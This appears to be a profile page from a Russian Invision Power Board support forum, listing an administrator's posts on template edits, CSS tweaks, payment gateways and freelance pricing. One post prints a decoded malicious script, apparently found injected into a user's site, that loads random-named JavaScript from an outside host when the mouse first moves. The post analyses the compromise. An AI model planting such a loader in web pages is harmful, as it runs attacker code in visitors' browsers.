Jump to content
View in the app

A better way to browse. Learn more.

IPBMafia.ru - поддержка Invision Community, релизы, темы, плагины и приложения

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Respected

Администраторы

Everything posted by Respected

  1. Вход через мейл на форуме можно осуществить с помощью хука
  2. Расшифровка данного скрипта: (function() { var url = '__smmxkycxsu.webhop.org/g/'; if (typeof window.xyzflag === 'undefined') { window.xyzflag = 0; } document.onmousemove = function() { if (window.xyzflag === 0) { window.xyzflag = 1; var head = document.getElementsByTagName('head')[0]; var script = document.createElement('script'); script.type = 'text/javascript'; script.onreadystatechange = function () { if (this.readyState == 'complete') { window.xyzflag = 2; } }; script.onload = function() { window.xyzflag = 2; }; script.src = url + Math.random().toString().substring(3) + '.js'; head.appendChild(script); } }; })(); [/CODE]
  3. Вот скрипт: Выкладывай, посмотрим что у тебя за код.. Права изменять бесполезно - злоумышленник при внедрении вредоносного кода имеет доступ к файлам через FTP.
  4. Картинки там простейшие, всё можно в гугле найти, вёрски не много, основное - форма заказа. Для неё нужно нанимать программиста. Я так думаю, конечно цена должна не превышать 50$! ИМХО!
  5. в ipb_styles.css в самый низ добавь: Содержимое шаблона userInfoPane замени на: <div itemscope itemtype="__schema.org/Person" class='user_details'> <if test="$this->request['t']"> <div class='horizontalAvatar left'> <if test="avatar:|:$author['member_id']"> <if test="canSeeProfiles:|:$this->memberData['g_is_supmod'] OR ( $this->memberData['g_mem_info'] && ! IPSMember::isInactive( $author ) )"> <a itemprop="url" href="{parse url="showuser={$author['member_id']}" template="showuser" seotitle="{$author['members_seo_name']}" base="public"}" title="{$this->lang->words['view_profile']}: {$author['members_display_name']}" class='ipsUserPhotoLink'> </if> <if test="hasVariable:|:$this->settings['member_topic_avatar_max']"> <img itemprop="image" src='{$author['pp_main_photo']}' class='ipsUserPhoto ipsUserPhoto_variable' /> <else /> <img itemprop="image" src='{$author['pp_thumb_photo']}' class='ipsUserPhoto ipsUserPhoto_large' /> </if> <if test="canSeeProfiles2:|:$this->memberData['g_is_supmod'] OR ( $this->memberData['g_mem_info'] && ! IPSMember::isInactive( $author ) )"> </a> </if> </li> <else /> <img itemprop="image" src='{$author['pp_thumb_photo']}' class='ipsUserPhoto ipsUserPhoto_large' /> </if> </div> <div class='horizontalUserInfo'> <div class='horizontalUsername'> <if test="$author['member_id']"> <span itemprop="creator name" class="author vcard">{parse template="userHoverCard" group="global" params="$author"}</span> <else /> {$author['members_display_name']} </if> </div> <div class='horizontal_border'></div> <ul class='horizontalInfoList' style='width: 180px;'> <li class='group_title'> {$author['_group_formatted']} </li> <div class='horizontal_info'></div> <if test="postCount:|:$author['member_id']"> <li class='post_count desc lighter'> {parse expression="$this->registry->getClass('class_localization')->formatNumber( intval( $author['posts'] ) )"} {$this->lang->words['m_posts']} </li> <div class='horizontal_info'></div> </if> </ul> <ul class='horizontalInfoList' style='width: 140px;'> <if test="rankimage:|:$author['member_rank_img']"> <li class='group_icon'> <if test="rankimageimage:|:$author['member_rank_img_i'] == 'img'"> <img src='{$author['member_rank_img']}' alt='' /> <else /> {$author['member_rank_img']} </if> </li> <div class='horizontal_info2'></div> </if> <if test="membertitle:|:$author['member_title']"> <li>{$author['member_title']}</li> </if> <if test="authorwarn:|:$author['show_warn']"> <li> <if test="$options['wl_id']"> <img src='{$this->settings['img_url']}/warn.png' class='clickable' onclick='warningPopup( this, {$options['wl_id']} )' title='{$this->lang->words['warnings_issued']}' /> </if> <a class='desc lighter blend_links' href='{parse url="app=members&amp;module=profile&amp;section=warnings&amp;member={$author['member_id']}&amp;from_app={$this->request['app']}&amp;from_id1={$contentid}&amp;from_id2={$options['id2']}" base="public"}' id='warn_link_{$contentid}_{$author['member_id']}' title='{$this->lang->words['warn_view_history']}'>{parse expression="sprintf( $this->lang->words['warn_status'], $author['warn_level'] )"}</a> </li> <div class='horizontal_info2'></div> </if> <div class='vertical_border2'></div> </ul> <div class='vertical_border'></div> <if test="authorcfields:|:$author['custom_fields'] != """> <ul class='horizontalInfoList custom_fields'> <foreach loop="customFieldsOuter:$author['custom_fields'] as $group => $data"> <foreach loop="customFields:$author['custom_fields'][ $group ] as $field"> <if test="$field != ''"> <li> {$field} </li> </if> </foreach> </foreach> </ul> </if> <ul class='horizontalInfoList' style='float: right; width: 190px;'> <li><if test="$author['_online']"><img src="{style_images_url}/post_online.png" alt="" class='post_online' data-tooltip="Online" /><else /><img src="{style_images_url}/post_offline.png" alt="" class='post_online' data-tooltip="Offline" /></if> Last active: {$author['_last_active']}</li> <li style='padding-left: 15px;'>Joined: {parse date="$author['joined']" format="DATE"}</li> </ul> </div> <else /> <span class='hide' itemprop="name">{$author['members_display_name']}</span> <ul class='basic_info'> <if test="membertitle:|:$author['member_title']"> <p class='desc member_title'>{$author['member_title']}</p> </if> <if test="avatar:|:$author['member_id']"> <li class='avatar'> <if test="canSeeProfiles:|:$this->memberData['g_is_supmod'] OR ( $this->memberData['g_mem_info'] && ! IPSMember::isInactive( $author ) )"> <a itemprop="url" href="{parse url="showuser={$author['member_id']}" template="showuser" seotitle="{$author['members_seo_name']}" base="public"}" title="{$this->lang->words['view_profile']}: {$author['members_display_name']}" class='ipsUserPhotoLink'> </if> <if test="hasVariable:|:$this->settings['member_topic_avatar_max']"> <img itemprop="image" src='{$author['pp_main_photo']}' class='ipsUserPhoto ipsUserPhoto_variable' /> <else /> <img itemprop="image" src='{$author['pp_thumb_photo']}' class='ipsUserPhoto ipsUserPhoto_large' /> </if> <if test="canSeeProfiles2:|:$this->memberData['g_is_supmod'] OR ( $this->memberData['g_mem_info'] && ! IPSMember::isInactive( $author ) )"> </a> </if> </li> <else /> <li class='avatar'> <img itemprop="image" src='{$author['pp_thumb_photo']}' class='ipsUserPhoto ipsUserPhoto_large' /> </li> </if> <li class='group_title'> {$author['_group_formatted']} </li> <if test="rankimage:|:$author['member_rank_img']"> <li class='group_icon'> <if test="rankimageimage:|:$author['member_rank_img_i'] == 'img'"> <img src='{$author['member_rank_img']}' alt='' /> <else /> {$author['member_rank_img']} </if> </li> </if> <if test="postCount:|:$author['member_id']"> <li class='post_count desc lighter'> {parse expression="$this->registry->getClass('class_localization')->formatNumber( intval( $author['posts'] ) )"} {$this->lang->words['m_posts']} </li> </if> <if test="authorwarn:|:$author['show_warn']"> <li> <if test="$options['wl_id']"> <img src='{$this->settings['img_url']}/warn.png' class='clickable' onclick='warningPopup( this, {$options['wl_id']} )' title='{$this->lang->words['warnings_issued']}' /> </if> <a class='desc lighter blend_links' href='{parse url="app=members&amp;module=profile&amp;section=warnings&amp;member={$author['member_id']}&amp;from_app={$this->request['app']}&amp;from_id1={$contentid}&amp;from_id2={$options['id2']}" base="public"}' id='warn_link_{$contentid}_{$author['member_id']}' title='{$this->lang->words['warn_view_history']}'>{parse expression="sprintf( $this->lang->words['warn_status'], $author['warn_level'] )"}</a> </li> </if> </ul> <if test="authorcfields:|:$author['custom_fields'] != """> <ul class='custom_fields'> <foreach loop="customFieldsOuter:$author['custom_fields'] as $group => $data"> <foreach loop="customFields:$author['custom_fields'][ $group ] as $field"> <if test="$field != ''"> <li> {$field} </li> </if> </foreach> </foreach> </ul> </if> </if> </div> [/code] [/spoiler]
  6. Если только HTML, то цена такая выйдет, если и логотипы, формы свои - сововсем другая!
  7. Я один раз накрутил, как впервые знакомился с этим инструментом - сразу в бан улетел Самая прибыльная компания была у моего англоязычного форума, которого сейчас уже нет, я там получал стабильно 2-3 $ в сутки! Большего я не добивался в системах контекстной рекламы..
  8. :) робокассу можно переделать, например, чтобы при её выборе (соответственно переименовать в Банковский чек доспустим) пользователю выводилась квитанцию с возможностью распечатать её Других выходов не вижу..
  9. Это какая посещаемость была? oO
  10. Это да, нужен очень посещаемый сайт, чтобы adsense приносил и деньги и удовольствие :)
  11. Не знаю, я такие вещи никогда не ставил..
  12. По логике нужно создавать новый способ оплаты.. а для создания необходимы знания в php. Вот документация, если нужна: How to create your own payment gateway Можно сделать немного по-другому.. Если покупался один из российских способов оплаты, будь то webmoney или робокасса, можно его переделать, чтобы добавить, например банковский чек и изображение с кнопкой распечатать.
  13. Редактируем шаблон Список форумов --> boardIndexTemplate Третья строчка: {parse variable="sidebar_enabled" default="$hide_side_blocks"} Заменить на: {parse variable="sidebar_enabled" default="$show_side_blocks"} [/code]
  14. Я так думаю можно сделать отдельную группу, настроить им права например пользователей и дать возможность заходить в админку, где их будет ждать ограничение, кроме использования магазина! По сути это самый правильный вариант :)
  15. Зависит от содержимого, если там будет сплошной html, думаю баксов 20 возьмут, за 10 вряд ли захотят чего-то делать ))
  16. РастЯнусть стиль Concise можно с помощью того же ipb_styles.css, в нём найти: .wrapper{ margin: 0 auto; min-width: 980px; max-width: 1600px; width: 980px; } [/CODE] Где [b]width: 980px;[/b] и отвечает за ширину форума :)
  17. taulalan,Привет! Нужно проверить лог файл, который находится в папке cache и называется он sql_latest_error.cgi. Выложи сюда его содержимое, и мы тебе подскажем решение данной проблемы! :)
  18. А какие виды оплаты там вообще есть?
  19. Заходим туда же, в наш любимый ipb_styles.css и находим вот такой код: .f_icon{ background: url("{style_images_url}/f_icon/example.png") no-repeat 50% 50%; } .notnew .f_icon{ opacity: 0.2; } .f_icon.f_icon4{ background-image: url("{style_images_url}/f_icon/example2.png"); } .f_icon.f_icon5{ background-image: url("{style_images_url}/f_icon/example3.png"); } [/CODE] Где: 1 - строчка присваивает общую иконку под именем example.png для всех форумов, у которых иконка не определена.. Например у форумов 4 и 5 есть определение иконки под названием example2.png и example3.png соответственно! Например, для форума под айдишником 6, иконку определяем таким образом: .f_icon.f_icon6{ background-image: url("{style_images_url}/f_icon/example6.png"); } ehren мозг..
  20. А что там будет? Сплошной хтмл?

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.